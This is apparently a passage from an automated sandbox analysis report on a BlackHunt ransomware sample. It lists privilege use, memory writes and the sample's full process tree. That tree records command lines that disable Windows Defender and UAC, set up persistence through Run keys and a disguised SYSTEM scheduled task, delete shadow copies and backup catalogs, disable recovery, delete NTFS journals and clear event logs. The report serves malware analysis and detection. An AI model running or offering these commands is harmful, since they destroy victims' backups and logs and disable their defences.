description pid Process Token: SeDebugPrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeRestorePrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeBackupPrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeTakeOwnershipPrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeAuditPrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeSecurityPrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeIncBasePriorityPrivilege 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeBackupPrivilege 6264 vssvc.exe Token: SeRestorePrivilege 6264 vssvc.exe Token: SeAuditPrivilege 6264 vssvc.exe Token: SeBackupPrivilege 3724 wbengine.exe Token: SeRestorePrivilege 3724 wbengine.exe Token: SeSecurityPrivilege 3724 wbengine.exe Token: SeSecurityPrivilege 4808 wevtutil.exe Token: SeBackupPrivilege 4808 wevtutil.exe Token: SeSecurityPrivilege 8056 wevtutil.exe Token: SeBackupPrivilege 8056 wevtutil.exe Token: SeSecurityPrivilege 5008 wevtutil.exe Token: SeBackupPrivilege 5008 wevtutil.exe Token: SeSecurityPrivilege 6552 wevtutil.exe Token: SeBackupPrivilege 6552 wevtutil.exe Token: SeSecurityPrivilege 6328 wevtutil.exe Token: SeBackupPrivilege 6328 wevtutil.exe Token: SeDebugPrivilege 2972 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1164 wrote to memory of 2732 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 92 PID 1164 wrote to memory of 2732 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 92 PID 1164 wrote to memory of 3092 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 89 PID 1164 wrote to memory of 3092 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 89 PID 1164 wrote to memory of 3924 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 94 PID 1164 wrote to memory of 3924 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 94 PID 1164 wrote to memory of 4656 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 100 PID 1164 wrote to memory of 4656 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 100 PID 1164 wrote to memory of 4596 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 97 PID 1164 wrote to memory of 4596 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 97 PID 2732 wrote to memory of 5084 2732 cmd.exe 98 PID 2732 wrote to memory of 5084 2732 cmd.exe 98 PID 3092 wrote to memory of 4044 3092 cmd.exe 95 PID 3092 wrote to memory of 4044 3092 cmd.exe 95 PID 1164 wrote to memory of 3720 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 103 PID 1164 wrote to memory of 3720 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 103 PID 4656 wrote to memory of 392 4656 cmd.exe 102 PID 4656 wrote to memory of 392 4656 cmd.exe 102 PID 3924 wrote to memory of 2904 3924 cmd.exe 168 PID 3924 wrote to memory of 2904 3924 cmd.exe 168 PID 1164 wrote to memory of 2772 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 105 PID 1164 wrote to memory of 2772 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 105 PID 1164 wrote to memory of 912 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 108 PID 1164 wrote to memory of 912 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 108 PID 1164 wrote to memory of 3912 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 109 PID 1164 wrote to memory of 3912 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 109 PID 1164 wrote to memory of 1652 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 115 PID 1164 wrote to memory of 1652 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 115 PID 1164 wrote to memory of 448 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 203 PID 1164 wrote to memory of 448 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 203 PID 1164 wrote to memory of 920 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 114 PID 1164 wrote to memory of 920 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 114 PID 1164 wrote to memory of 928 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 117 PID 1164 wrote to memory of 928 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 117 PID 1164 wrote to memory of 2968 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 118 PID 1164 wrote to memory of 2968 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 118 PID 1164 wrote to memory of 2668 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 122 PID 1164 wrote to memory of 2668 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 122 PID 1164 wrote to memory of 1876 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 123 PID 1164 wrote to memory of 1876 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 123 PID 1164 wrote to memory of 1744 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 125 PID 1164 wrote to memory of 1744 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 125 PID 1164 wrote to memory of 684 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 132 PID 1164 wrote to memory of 684 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 132 PID 1164 wrote to memory of 4988 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 128 PID 1164 wrote to memory of 4988 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 128 PID 4596 wrote to memory of 1516 4596 cmd.exe 130 PID 4596 wrote to memory of 1516 4596 cmd.exe 130 PID 1164 wrote to memory of 2976 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 133 PID 1164 wrote to memory of 2976 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 133 PID 1164 wrote to memory of 4376 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 135 PID 1164 wrote to memory of 4376 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 135 PID 1652 wrote to memory of 3732 1652 cmd.exe 186 PID 1652 wrote to memory of 3732 1652 cmd.exe 186 PID 1164 wrote to memory of 2028 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 138 PID 1164 wrote to memory of 2028 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 138 PID 2772 wrote to memory of 1768 2772 cmd.exe 184 PID 2772 wrote to memory of 1768 2772 cmd.exe 184 PID 3720 wrote to memory of 1672 3720 cmd.exe 139 PID 3720 wrote to memory of 1672 3720 cmd.exe 139 PID 912 wrote to memory of 2316 912 cmd.exe 143 PID 912 wrote to memory of 2316 912 cmd.exe 143 PID 1164 wrote to memory of 952 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 141 PID 1164 wrote to memory of 952 1164 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 141 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe"C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1164 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:684
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2028
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe" /F2⤵PID:2016
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe" /F3⤵
- Creates scheduled task(s)
PID:448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4340
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3448
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2368
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3732
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1768 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2220
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4784
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2184
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:676
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2908
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:9884
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:6484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:9904
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:6820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:9932
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:6076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:10000
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10044
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10076
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6552
-
-
-
